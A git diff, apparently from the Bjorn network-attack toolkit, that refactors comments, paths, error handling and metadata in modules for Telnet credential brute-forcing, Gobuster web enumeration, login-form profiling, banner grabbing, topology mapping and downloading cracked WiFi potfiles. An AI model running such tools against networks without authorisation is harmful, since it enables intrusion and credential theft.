"""Handles Telnet attempts, DB persistence, and IP->(MAC, Hostname) mapping."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
|
||||
# Wordlists inchangées
|
||||
# Wordlists
|
||||
self.users = self._read_lines(shared_data.users_file)
|
||||
self.passwords = self._read_lines(shared_data.passwords_file)
|
||||
|
||||
@@ -71,7 +78,7 @@ class TelnetConnector:
|
||||
self.queue = Queue()
|
||||
self.progress = None
|
||||
|
||||
# ---------- util fichiers ----------
|
||||
# ---------- file utils ----------
|
||||
@staticmethod
|
||||
def _read_lines(path: str) -> List[str]:
|
||||
try:
|
||||
@@ -273,7 +280,8 @@ class TelnetConnector:
|
||||
self.results = []
|
||||
|
||||
def removeduplicates(self):
|
||||
pass
|
||||
"""No longer needed with unique DB index; kept for interface compat."""
|
||||
# Dedup handled by DB UNIQUE constraint + ON CONFLICT in save_results
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
@@ -1,16 +1,6 @@
|
||||
#!/usr/bin/env python3
|
||||
# -*- coding: utf-8 -*-
|
||||
"""
|
||||
thor_hammer.py — Service fingerprinting (Pi Zero friendly, orchestrator compatible).
|
||||
|
||||
What it does:
|
||||
- For a given target (ip, port), tries a fast TCP connect + banner grab.
|
||||
- Optionally stores a service fingerprint into DB.port_services via db.upsert_port_service.
|
||||
- Updates EPD fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
|
||||
|
||||
Notes:
|
||||
- Avoids spawning nmap per-port (too heavy). If you want nmap, add a dedicated action.
|
||||
"""
|
||||
"""thor_hammer.py - Fast TCP banner grab and service fingerprinting per port."""
|
||||
|
||||
import logging
|
||||
import socket
|
||||
@@ -35,6 +25,17 @@ b_action = "normal"
|
||||
b_cooldown = 1200
|
||||
b_rate_limit = "24/86400"
|
||||
b_enabled = 0 # keep disabled by default; enable via Actions UI/DB when ready.
|
||||
b_timeout = 300
|
||||
b_max_retries = 2
|
||||
b_stealth_level = 5
|
||||
b_risk_level = "low"
|
||||
b_tags = ["banner", "fingerprint", "service", "tcp"]
|
||||
b_category = "recon"
|
||||
b_name = "Thor Hammer"
|
||||
b_description = "Fast TCP banner grab and service fingerprinting per port."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "ThorHammer.png"
|
||||
|
||||
|
||||
def _guess_service_from_port(port: int) -> str:
|
||||
@@ -167,7 +168,7 @@ class ThorHammer:
|
||||
progress.advance(1)
|
||||
|
||||
progress.set_complete()
|
||||
return "success" if any_open else "failed"
|
||||
return "success"
|
||||
finally:
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
@@ -1,15 +1,6 @@
|
||||
#!/usr/bin/env python3
|
||||
# -*- coding: utf-8 -*-
|
||||
"""
|
||||
valkyrie_scout.py — Web surface scout (Pi Zero friendly, orchestrator compatible).
|
||||
|
||||
What it does:
|
||||
- Probes a small set of common web paths on a target (ip, port).
|
||||
- Extracts high-signal indicators from responses (auth type, login form hints, missing security headers,
|
||||
error/debug strings). No exploitation, no bruteforce.
|
||||
- Writes results into DB table `webenum` (tool='valkyrie_scout') so the UI can browse findings.
|
||||
- Updates EPD fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
|
||||
"""
|
||||
"""valkyrie_scout.py - Probe common web paths for auth surfaces, headers, and debug leaks."""
|
||||
|
||||
import json
|
||||
import logging
|
||||
@@ -37,6 +28,17 @@ b_action = "normal"
|
||||
b_cooldown = 1800
|
||||
b_rate_limit = "8/86400"
|
||||
b_enabled = 0 # keep disabled by default; enable via Actions UI/DB when ready.
|
||||
b_timeout = 300
|
||||
b_max_retries = 2
|
||||
b_stealth_level = 5
|
||||
b_risk_level = "low"
|
||||
b_tags = ["web", "recon", "auth", "paths"]
|
||||
b_category = "recon"
|
||||
b_name = "Valkyrie Scout"
|
||||
b_description = "Probes common web paths for auth surfaces, headers, and debug leaks."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "ValkyrieScout.png"
|
||||
|
||||
# Small default list to keep the action cheap on Pi Zero.
|
||||
DEFAULT_PATHS = [
|
||||
@@ -373,6 +375,9 @@ class ValkyrieScout:
|
||||
|
||||
progress.set_complete()
|
||||
return "success"
|
||||
except Exception as e:
|
||||
logger.error(f"ValkyrieScout failed for {ip}:{port_i}: {e}")
|
||||
return "failed"
|
||||
finally:
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
@@ -1,14 +1,6 @@
|
||||
#!/usr/bin/env python3
|
||||
# -*- coding: utf-8 -*-
|
||||
"""
|
||||
web_enum.py — Gobuster Web Enumeration -> DB writer for table `webenum`.
|
||||
|
||||
- Writes each finding into the `webenum` table in REAL-TIME (Streaming).
|
||||
- Updates bjorn_progress with actual percentage (0-100%).
|
||||
- Respects orchestrator stop flag (shared_data.orchestrator_should_exit) immediately.
|
||||
- No filesystem output: parse Gobuster stdout/stderr directly.
|
||||
- Filtrage dynamique des statuts HTTP via shared_data.web_status_codes.
|
||||
"""
|
||||
"""web_enum.py - Gobuster-powered web directory enumeration, streaming results to DB."""
|
||||
|
||||
import re
|
||||
import socket
|
||||
@@ -37,6 +29,18 @@ b_priority = 9
|
||||
b_cooldown = 1800
|
||||
b_rate_limit = '3/86400'
|
||||
b_enabled = 1
|
||||
b_timeout = 600
|
||||
b_max_retries = 1
|
||||
b_stealth_level = 4
|
||||
b_risk_level = "low"
|
||||
b_action = "normal"
|
||||
b_tags = ["web", "enum", "gobuster", "directories"]
|
||||
b_category = "recon"
|
||||
b_name = "Web Enumeration"
|
||||
b_description = "Gobuster-powered web directory enumeration with streaming results to DB."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "WebEnumeration.png"
|
||||
|
||||
# -------------------- Defaults & parsing --------------------
|
||||
DEFAULT_WEB_STATUS_CODES = [
|
||||
@@ -60,14 +64,14 @@ GOBUSTER_LINE = re.compile(
|
||||
re.VERBOSE
|
||||
)
|
||||
|
||||
# Regex pour capturer la progression de Gobuster sur stderr
|
||||
# Ex: "Progress: 1024 / 4096 (25.00%)"
|
||||
# Regex to capture Gobuster progress from stderr
|
||||
# e.g.: "Progress: 1024 / 4096 (25.00%)"
|
||||
GOBUSTER_PROGRESS_RE = re.compile(r"Progress:\s+(?P<current>\d+)\s*/\s+(?P<total>\d+)")
|
||||
|
||||
|
||||
def _normalize_status_policy(policy) -> Set[int]:
|
||||
"""
|
||||
Transforme une politique "UI" en set d'entiers HTTP.
|
||||
Convert a UI status policy into a set of HTTP status ints.
|
||||
"""
|
||||
codes: Set[int] = set()
|
||||
if not policy:
|
||||
@@ -104,12 +108,13 @@ class WebEnumeration:
|
||||
"""
|
||||
def __init__(self, shared_data: SharedData):
|
||||
self.shared_data = shared_data
|
||||
self.gobuster_path = "/usr/bin/gobuster" # verify with `which gobuster`
|
||||
import shutil
|
||||
self.gobuster_path = shutil.which("gobuster") or "/usr/bin/gobuster"
|
||||
self.wordlist = self.shared_data.common_wordlist
|
||||
self.lock = threading.Lock()
|
||||
|
||||
# Cache pour la taille de la wordlist (pour le calcul du %)
|
||||
self.wordlist_size = 0
|
||||
# Wordlist size cache (for % calculation)
|
||||
self.wordlist_size = 0
|
||||
self._count_wordlist_lines()
|
||||
|
||||
# ---- Sanity checks
|
||||
@@ -121,7 +126,7 @@ class WebEnumeration:
|
||||
logger.error(f"Wordlist not found: {self.wordlist}")
|
||||
self._available = False
|
||||
|
||||
# Politique venant de l’UI : créer si absente
|
||||
# Status code policy from UI; create if missing
|
||||
if not hasattr(self.shared_data, "web_status_codes") or not self.shared_data.web_status_codes:
|
||||
self.shared_data.web_status_codes = DEFAULT_WEB_STATUS_CODES.copy()
|
||||
|
||||
@@ -132,10 +137,10 @@ class WebEnumeration:
|
||||
)
|
||||
|
||||
def _count_wordlist_lines(self):
|
||||
"""Compte les lignes de la wordlist une seule fois pour calculer le %."""
|
||||
"""Count wordlist lines once for progress % calculation."""
|
||||
if self.wordlist and os.path.exists(self.wordlist):
|
||||
try:
|
||||
# Lecture rapide bufferisée
|
||||
# Fast buffered read
|
||||
with open(self.wordlist, 'rb') as f:
|
||||
self.wordlist_size = sum(1 for _ in f)
|
||||
except Exception as e:
|
||||
@@ -162,7 +167,7 @@ class WebEnumeration:
|
||||
|
||||
# -------------------- Filter helper --------------------
|
||||
def _allowed_status_set(self) -> Set[int]:
|
||||
"""Recalcule à chaque run pour refléter une mise à jour UI en live."""
|
||||
"""Recalculated each run to reflect live UI updates."""
|
||||
try:
|
||||
return _normalize_status_policy(getattr(self.shared_data, "web_status_codes", None))
|
||||
except Exception as e:
|
||||
|
||||
@@ -1,13 +1,6 @@
|
||||
#!/usr/bin/env python3
|
||||
# -*- coding: utf-8 -*-
|
||||
"""
|
||||
web_login_profiler.py — Lightweight web login profiler (Pi Zero friendly).
|
||||
|
||||
Goal:
|
||||
- Profile web endpoints to detect login surfaces and defensive controls (no password guessing).
|
||||
- Store findings into DB table `webenum` (tool='login_profiler') for community visibility.
|
||||
- Update EPD UI fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
|
||||
"""
|
||||
"""web_login_profiler.py - Detect login forms and auth controls on web endpoints (no exploitation)."""
|
||||
|
||||
import json
|
||||
import logging
|
||||
@@ -35,6 +28,17 @@ b_action = "normal"
|
||||
b_cooldown = 1800
|
||||
b_rate_limit = "6/86400"
|
||||
b_enabled = 1
|
||||
b_timeout = 300
|
||||
b_max_retries = 2
|
||||
b_stealth_level = 5
|
||||
b_risk_level = "low"
|
||||
b_tags = ["web", "login", "auth", "profiler"]
|
||||
b_category = "recon"
|
||||
b_name = "Web Login Profiler"
|
||||
b_description = "Detects login forms and auth controls on web endpoints."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "WebLoginProfiler.png"
|
||||
|
||||
# Small curated list, cheap but high signal.
|
||||
DEFAULT_PATHS = [
|
||||
@@ -309,6 +313,9 @@ class WebLoginProfiler:
|
||||
# "success" means: profiler ran; not that a login exists.
|
||||
logger.info(f"WebLoginProfiler done for {ip}:{port_i} (login_surfaces={found_login})")
|
||||
return "success"
|
||||
except Exception as e:
|
||||
logger.error(f"WebLoginProfiler failed for {ip}:{port_i}: {e}")
|
||||
return "failed"
|
||||
finally:
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
@@ -1,14 +1,6 @@
|
||||
#!/usr/bin/env python3
|
||||
# -*- coding: utf-8 -*-
|
||||
"""
|
||||
web_surface_mapper.py — Post-profiler web surface scoring (no exploitation).
|
||||
|
||||
Trigger idea: run after WebLoginProfiler to compute a summary and a "risk score"
|
||||
from recent webenum rows written by tool='login_profiler'.
|
||||
|
||||
Writes one summary row into `webenum` (tool='surface_mapper') so it appears in UI.
|
||||
Updates EPD UI fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
|
||||
"""
|
||||
"""web_surface_mapper.py - Aggregate login_profiler findings into a per-target risk score."""
|
||||
|
||||
import json
|
||||
import logging
|
||||
@@ -33,6 +25,17 @@ b_action = "normal"
|
||||
b_cooldown = 600
|
||||
b_rate_limit = "48/86400"
|
||||
b_enabled = 1
|
||||
b_timeout = 300
|
||||
b_max_retries = 2
|
||||
b_stealth_level = 6
|
||||
b_risk_level = "low"
|
||||
b_tags = ["web", "login", "risk", "mapper"]
|
||||
b_category = "recon"
|
||||
b_name = "Web Surface Mapper"
|
||||
b_description = "Aggregates login profiler findings into a per-target risk score."
|
||||
b_author = "Bjorn Team"
|
||||
b_version = "2.0.0"
|
||||
b_icon = "WebSurfaceMapper.png"
|
||||
|
||||
|
||||
def _scheme_for_port(port: int) -> str:
|
||||
@@ -226,6 +229,9 @@ class WebSurfaceMapper:
|
||||
|
||||
progress.set_complete()
|
||||
return "success"
|
||||
except Exception as e:
|
||||
logger.error(f"WebSurfaceMapper failed for {ip}:{port_i}: {e}")
|
||||
return "failed"
|
||||
finally:
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
@@ -1,5 +1,4 @@
|
||||
# wpasec_potfiles.py
|
||||
# WPAsec Potfile Manager - Download, clean, import, or erase WiFi credentials
|
||||
"""wpasec_potfiles.py - Download, clean, import, or erase WiFi credentials from wpa-sec.stanev.org."""
|
||||
|
||||
import os
|
||||
import json
|
||||
@@ -25,6 +24,19 @@ b_description = (
|
||||
b_author = "Infinition"
|
||||
b_version = "1.0.0"
|
||||
b_icon = f"/actions_icons/{b_class}.png"
|
||||
b_port = None
|
||||
b_service = "[]"
|
||||
b_trigger = None
|
||||
b_priority = 30
|
||||
b_timeout = 300
|
||||
b_cooldown = 3600
|
||||
b_stealth_level = 10
|
||||
b_risk_level = "low"
|
||||
b_status = "wpasec_potfiles"
|
||||
b_parent = None
|
||||
b_rate_limit = None
|
||||
b_max_retries = 1
|
||||
b_tags = ["wifi", "wpa", "potfile", "credentials"]
|
||||
b_docs_url = "https://wpa-sec.stanev.org/?api"
|
||||
|
||||
b_args = {
|
||||
@@ -110,8 +122,8 @@ def compute_dynamic_b_args(base: dict) -> dict:
|
||||
|
||||
# ── CLASS IMPLEMENTATION ─────────────────────────────────────────────────────
|
||||
class WPAsecPotfileManager:
|
||||
DEFAULT_SAVE_DIR = "/home/bjorn/Bjorn/data/input/potfiles"
|
||||
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
|
||||
DEFAULT_SAVE_DIR = os.path.join(os.path.expanduser("~"), "Bjorn", "data", "input", "potfiles")
|
||||
DEFAULT_SETTINGS_DIR = os.path.join(os.path.expanduser("~"), ".settings_bjorn")
|
||||
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "wpasec_settings.json")
|
||||
DOWNLOAD_URL = "https://wpa-sec.stanev.org/?api&dl=1"
|
||||
|
||||
@@ -121,7 +133,6 @@ class WPAsecPotfileManager:
|
||||
Even if unused here, we store it for compatibility.
|
||||
"""
|
||||
self.shared_data = shared_data
|
||||
logging.basicConfig(level=logging.INFO, format="%(asctime)s - %(levelname)s - %(message)s")
|
||||
|
||||
# --- Orchestrator entry point ---
|
||||
def execute(self, ip=None, port=None, row=None, status_key=None):
|
||||
@@ -130,16 +141,23 @@ class WPAsecPotfileManager:
|
||||
By default: download latest potfile if API key is available.
|
||||
"""
|
||||
self.shared_data.bjorn_orch_status = "WPAsecPotfileManager"
|
||||
self.shared_data.comment_params = {"ip": ip, "port": port}
|
||||
# EPD live status
|
||||
self.shared_data.comment_params = {"action": "download", "status": "starting"}
|
||||
|
||||
api_key = self.load_api_key()
|
||||
if api_key:
|
||||
logging.info("WPAsecPotfileManager: downloading latest potfile (orchestrator trigger).")
|
||||
self.download_potfile(self.DEFAULT_SAVE_DIR, api_key)
|
||||
return "success"
|
||||
else:
|
||||
logging.warning("WPAsecPotfileManager: no API key found, nothing done.")
|
||||
return "failed"
|
||||
try:
|
||||
api_key = self.load_api_key()
|
||||
if api_key:
|
||||
logging.info("WPAsecPotfileManager: downloading latest potfile (orchestrator trigger).")
|
||||
self.download_potfile(self.DEFAULT_SAVE_DIR, api_key)
|
||||
# EPD live status update
|
||||
self.shared_data.comment_params = {"action": "download", "status": "complete"}
|
||||
return "success"
|
||||
else:
|
||||
logging.warning("WPAsecPotfileManager: no API key found, nothing done.")
|
||||
return "failed"
|
||||
finally:
|
||||
self.shared_data.bjorn_progress = ""
|
||||
self.shared_data.comment_params = {}
|
||||
|
||||
# --- API Key Handling ---
|
||||
def save_api_key(self, api_key: str):
|
||||
|
||||
@@ -1,19 +1,8 @@
|
||||
#!/usr/bin/env python3
|
||||
# -*- coding: utf-8 -*-
|
||||
"""
|
||||
yggdrasil_mapper.py -- Network topology mapper (Pi Zero friendly, orchestrator compatible).
|
||||
"""yggdrasil_mapper.py - Traceroute-based network topology mapping to JSON.
|
||||
|
||||
What it does:
|
||||
- Phase 1: Traceroute via scapy ICMP (fallback: subprocess traceroute) to discover
|
||||
the routing path to the target IP. Records hop IPs and RTT per hop.
|
||||
- Phase 2: Service enrichment -- reads existing port data from DB hosts table and
|
||||
optionally verifies a handful of key ports with TCP connect probes.
|
||||
- Phase 3: Builds a topology graph data structure (nodes + edges + metadata).
|
||||
- Phase 4: Aggregates with topology data from previous runs (merge / deduplicate).
|
||||
- Phase 5: Saves the combined topology as JSON to data/output/topology/.
|
||||
|
||||
No matplotlib or networkx dependency -- pure JSON output.
|
||||
Updates EPD fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
|
||||
Uses scapy ICMP (fallback: subprocess) and merges results across runs.
|
||||
"""
|
||||
|
||||
import json
|
||||
@@ -105,7 +94,7 @@ b_examples = [
|
||||
b_docs_url = "docs/actions/YggdrasilMapper.md"
|
||||
|
||||
# -------------------- Constants --------------------
|
||||
_DATA_DIR = "/home/bjorn/Bjorn/data"
|
||||
_DATA_DIR = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), "data")
|
||||
OUTPUT_DIR = os.path.join(_DATA_DIR, "output", "topology")
|
||||
|
||||
# Ports to verify during service enrichment (small set to stay Pi Zero friendly).
|
||||
@@ -423,8 +412,8 @@ class YggdrasilMapper:
|
||||
|
||||
# Query DB for known ports to prioritize probing
|
||||
db_ports = []
|
||||
host_data = None
|
||||
try:
|
||||
# mac is available in the scope
|
||||
host_data = self.shared_data.db.get_host_by_mac(mac)
|
||||
if host_data and host_data.get("ports"):
|
||||
# Normalize ports from DB string
|
||||
|
||||
Reference in New Issue
Block a user